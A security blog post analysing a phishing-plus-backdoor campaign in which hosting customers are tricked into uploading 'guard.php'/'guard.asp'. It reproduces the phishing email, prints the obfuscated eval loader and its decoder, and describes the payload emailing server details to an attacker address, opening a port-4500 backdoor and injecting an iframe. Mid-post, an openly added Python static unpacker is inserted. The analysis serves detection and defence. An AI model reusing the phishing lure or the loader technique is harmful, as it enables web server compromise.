PHP/WebGuard (and ASP/WebGuard) Attacks

By: Jose

Last week I got three separate emails about an attack that people were seeing, blending phishing, a Trojan, a backdoor, and a website hack all in one. The whole thing relies on the target user falling prey to the “phish”. In this case, they’re not after someone’s bank account, they’re after their participation in a website hack. I didn’t write this up last week due to time constraints, and now this is receiving wider attention.

The Trojan/phish emails look innocent enough:

Dear COLO COMPANY valued Members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file “guard.php” in: “./public_html” or (for Windows Based servers which use ASP) upload the file “guard.asp” in: “./wwwroot” in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux based websites that use PHP/CGI/PERL:
1) Download the attachment named “guard.zip”
2) Extract file “guard.php”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “Public_html” or “htdocs”
6) Choose “Upload Files”
7) Upload the file “guard.php”
8) Check its URL too “http://www.yoursite.com/guard.php”, if it is ok

For Windows based websites that use ASP:
1) Download the attachment named “guard.zip”
2) Extract file “guard.asp”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “wwwroot” directory
6) Choose “Upload Files”
7) Upload the file “guard.asp”
8) Check its URL too “http://www.yoursite.com/guard.asp”, if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards

COLO COMPANY

COLO COMPANY is just dumped in there to fool you and is replaced by the organization you’re with. I’ve seen several high profile companies’ customers targeted with this. The email contains an attachment named ‘guard.zip’, which extracts to two files (which they told you about in the email):

Archive:  guard.zip
Length     Date   Time    Name
--------    ----   ----    ----
161024  02-07-07 18:27   guard.asp
129732  02-08-07 02:15   guard.php
--------                   -------
290756                   2 files

These are just website server script files, and they’re plain text you can examine. The scripts themselves have a variable integer in them, and every copy of this I’ve seen has had a different integer. This means that static detection via MD5s of the files or email attachments will not work. The Snort sig (see below) takes this into account. If you take the time to look at the PHP you’ll see this:

$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=155620;eval((base64_decode(base64_decode('SkU4d01E
QlBNRTh3TUQxbWIzQmxiaWdrVDA5UE1FOHdUekF3TENkeVlpY3BPM2RvYVd4bEtDMHRKRTh3TUU4d01FOHdNQ2xtWjJWMGN5Z2tUe
kF3TUU4d1R6QXdMREV3TWpRcE8yWm5aWFJ6S0NSUE1EQXdUekJQTURBc05EQTVOaWs3SkU5UE1EQlBNREJQTUQwb1ltRnpaVFkwWD
JSbFkyOWtaU2h6ZEhKMGNpaG1jbVZoWkNna1R6QXdNRTh3VHpBd0xETTNNaWtzSnpFeU16UTFOamM0T1RCQllVSmlRMk5FWkVWbFJ
tWkhaMGhvU1dsS2FrdHJUR3hOYlU1dVQyOVFjRkZ4VW5KVGMxUjBWWFZXZGxkM1dIaFplVnA2S3k4OUp5d25RVUpEUkVWR1IwaEpT
a3RNVFU1UFVGRlNVMVJWVmxkWVdWcGhZbU5rWldabmFHbHFhMnh0Ym05d2NYSnpkSFYyZDNoNWVqQXhNak0wTlRZM09Ea3JMeWNwS
1NrN1pYWmhiQ2drVDA4d01FOHdNRTh3S1RzPQ=='))));return;?>
...

Not overtly bad, but obviously not good. This is doubly encoded PHP at this point: base64 encoded and encoded with a private decoder that looks like this:

// Re-open this same script file and skip forward $O00O00O00 (the stub's __LINE__) lines,
// so the read position lands on the encoded payload that follows the stub
$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);
// Read 372 bytes of payload, undo a fixed alphabet substitution with strtr(), then base64-decode it
$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'1234567890AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
// Execute the recovered stage
eval($OO00O00O0);
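For analysts who would rather not run the script to see what it hides, here is an added example (my own code, not from the original post or the malware) of a static unpacker for exactly this layering: it peels the double-base64 wrapper, pulls the fread() length and strtr() alphabets out of the decoder, and reproduces the file-reading and alphabet swap in Python without any eval. The variable names, the stage-2 string and build_sample() are constructed test scaffolding.

```python
import base64
import re

# Static unpacker for the guard.php layering described above (added example, not the post's
# code): peel the eval(base64_decode(base64_decode(...))) stage, read the decoder's fread()
# length and strtr() alphabets, then recover the stage-2 source without executing anything.

def php_strtr(s: str, frm: str, to: str) -> str:
    """Emulate PHP strtr($s, $from, $to): one pass, extra chars of the longer alphabet ignored."""
    n = min(len(frm), len(to))
    return s.translate(str.maketrans(frm[:n], to[:n]))

def peel_outer_stage(stub_line: str) -> str:
    """Stage 1: the double-base64 wrapper hides the decoder; decode it instead of eval'ing it."""
    m = re.search(r"base64_decode\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)", stub_line)
    if m is None:
        raise ValueError("no double-base64 stage in stub")
    return base64.b64decode(base64.b64decode(m.group(1))).decode("latin-1")

def decoder_params(decoder: str):
    """Pull the fread() byte count and the two strtr() alphabets out of the stage-1 decoder."""
    m = re.search(r"strtr\(fread\(\$\w+,(\d+)\),'([^']*)','([^']*)'\)", decoder)
    if m is None:
        raise ValueError("decoder does not have the expected fread/strtr shape")
    return int(m.group(1)), m.group(2), m.group(3)

def unpack(script: bytes) -> str:
    """Stage-2 PHP hidden in a guard.php-style file (assumes pre-stub lines < 1023 bytes, the fgets limit)."""
    lines = script.split(b"\n")
    # The stub saves __LINE__; while(--$n) fgets() skips n-1 lines and the extra fgets() eats the
    # stub line itself, so fread() starts on the line right after the stub.
    stub_idx = next(i for i, ln in enumerate(lines) if b"__LINE__" in ln)
    decoder = peel_outer_stage(lines[stub_idx].decode("latin-1"))
    length, frm, to = decoder_params(decoder)
    payload = b"\n".join(lines[stub_idx + 1:])[:length].decode("latin-1")  # fread() stops at EOF
    return base64.b64decode(php_strtr(payload, frm, to)).decode("latin-1")

# Constructed sample (not a real guard.php): a benign stage-2 string wrapped the way the post's
# decoder expects, so unpack() can be exercised offline. Alphabets are the post's own.
FROM_ALPHA = "1234567890AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz+/="
TO_ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def build_sample(stage2: bytes) -> bytes:
    blob = php_strtr(base64.b64encode(stage2).decode(), TO_ALPHA, FROM_ALPHA)  # inverse of decoder's strtr
    decoder = (f"$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);"
               f"fgets($O000O0O00,4096);$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,{len(blob)}),"
               f"'{FROM_ALPHA}','{TO_ALPHA}')));eval($OO00O00O0);")
    outer = base64.b64encode(base64.b64encode(decoder.encode())).decode()
    stub = f"$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;eval((base64_decode(base64_decode('{outer}'))));return;?>"
    return b"<?php\n" + stub.encode() + b"\n" + blob.encode()
```

On a real sample, feed the file bytes to unpack() and inspect the returned source; if the payload is itself wrapped again, repeat on the output rather than executing it.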

After a couple of rounds of decoding you see that it will spit out some JavaScript and do two things on the server. First, it will send an email to the recipient:

To: firstbts@gmail.com
Subject: Darwin Ocho.local 7.9.0 Darwin Kernel Version 7.9.0: Wed Mar 30 20:11:17 PST 2005; root:xnu/xnu-517.12.7.obj~1/RELEASE_PPC Power Macintosh powerpc
From: L4M3r

Note that this email address is dead. (That subject line is just “uname -a”.) Secondly, it will try to backdoor your box on port 4500. But it will also spit out some HTML to the web clients that looks a bit like this:

[script language="JavaScript" type="text/javascript"]
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%
6A%61%76%61%73%63%72%69%70%7...

JavaScript, our old friend, and doubly encoded to boot (escaped and encoded, which in turn is decoded by a function dF() written to the browser in JavaScript). After decoding it, you’ll see (what your browser sees, ultimately) a page entitled “Enterprise Threat Protection” and an IFRAME that points to ht tp://westerncapitalfx.com/[REMOVE]images/php/index.php (URL deliberately obfuscated). When I looked last week it wasn’t live, and it doesn’t seem live now.

All in all a not so sophisticated attack, but one that’s making the rounds. This has hit a few high profile hosting centers, so beware: the box you may be sharing with someone could be botted. Detecting this isn’t so hard; I helped Matt Jonkman develop Snort sigs for it. If you’re a webmaster, look for emails to that destination address. And if you’re looking for infected hosts, check for port 4500 listeners. I believe some AV companies have added detection for this, too.

Updated to add: I looked again, and no one has any specific AV detection for this threat. AVG does detect a PHP backdoor, but this detection appears to be non-specific.

I finally did the writeup to save some people some time and to quit shuttling around private emails. I don’t know how widespread this is by this point.
